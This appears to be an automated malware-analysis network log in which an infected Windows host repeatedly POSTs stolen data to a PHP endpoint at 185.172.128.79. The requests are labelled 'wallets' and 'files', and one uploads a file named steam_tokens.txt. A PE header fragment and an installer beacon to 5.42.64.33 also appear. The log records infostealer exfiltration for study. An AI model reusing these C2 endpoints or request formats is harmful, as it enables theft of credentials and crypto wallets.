                                                                                                                                                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Feb 5, 2024 12:13:05.483810902 CET 201 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 947
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
Feb 5, 2024 12:13:05.821293116 CET 170 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
Feb 5, 2024 12:13:05.889448881 CET 468 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="message"wallets------IIDHJKFBGIIJJKFIJDBG--
Feb 5, 2024 12:13:06.212568998 CET 1286 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2408
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
Feb 5, 2024 12:13:06.216924906 CET 466 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 265
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="message"files------BAKEBAFIIECBGCAAAAFC--
Feb 5, 2024 12:13:06.544961929 CET 1286 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2052
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
Feb 5, 2024 12:13:06.715724945 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECA
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
Feb 5, 2024 12:13:07.053371906 CET 170 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
Feb 5, 2024 12:13:07.064419985 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
Feb 5, 2024 12:13:07.399482012 CET 170 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.413405895 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.750111103 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.757878065 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.092911959 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.108943939 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.444791079 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.451145887 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGH
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.785240889 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.798360109 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.133774996 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.140825987 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.479429960 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.488332033 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:12.652684927 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:12.658229113 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAA
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:12.993660927 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.001832008 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HJDGCGDBGCAAEBFIECGH
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.334323883 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.340456009 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.671547890 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.681777954 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.014175892 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.026607990 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.357114077 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.365812063 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDBKJJKEBGHIDGCBKJJD
Host: 185.172.128.79
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:14.698031902 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:14.754123926 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:15.092242956 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:15.106045008 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:15.443389893 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:15.452524900 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGH
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:15.784149885 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:15.796791077 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:16.136023045 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:16.143661022 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:16.482316971 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:16.489732981 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:16.825265884 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:16.836154938 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:17.173213959 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:17.182748079 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCF
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:17.520910025 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:17.532546997 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:17.869843006 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:17.885910034 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEG
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:18.217402935 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:18.309395075 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:18.641331911 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:19.499639034 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:19.838248014 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:20.139950991 CET 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
Host: 185.172.128.79
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:20.477508068 CET 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:20.521250010 CET 564 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH
Host: 185.172.128.79
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="file"------GCBGIIECGHCAKECAFBFH--
Feb 5, 2024 12:13:20.856565952 CET | 170 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:20.939659119 CET | 204 | OUT | POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
Host: 185.172.128.79
Content-Length: 142507
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:21.660991907 CET | 170 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Feb 5, 2024 12:13:21.740997076 CET | 471 | OUT | POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE
Host: 185.172.128.79
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="message"jbdtaijovg------JEBGCBAFCGDAAKFIDGIE--
Feb 5, 2024 12:13:22.070750952 CET | 170 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:13:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49742 | 5.42.64.33 | 80 | 4632 | C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:27.433259964 CET | 139 | OUT | GET /ping.php?substr=four HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 5.42.64.33
Connection: Keep-Alive
Cache-Control: no-cache
Feb 5, 2024 12:13:27.651128054 CET | 419 | IN | HTTP/1.1 404 Not Found
X-Powered-By: Express
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=utf-8
Content-Length: 147
Date: Mon, 05 Feb 2024 11:13:27 GMT
Connection: keep-alive
Keep-Alive: timeout=5
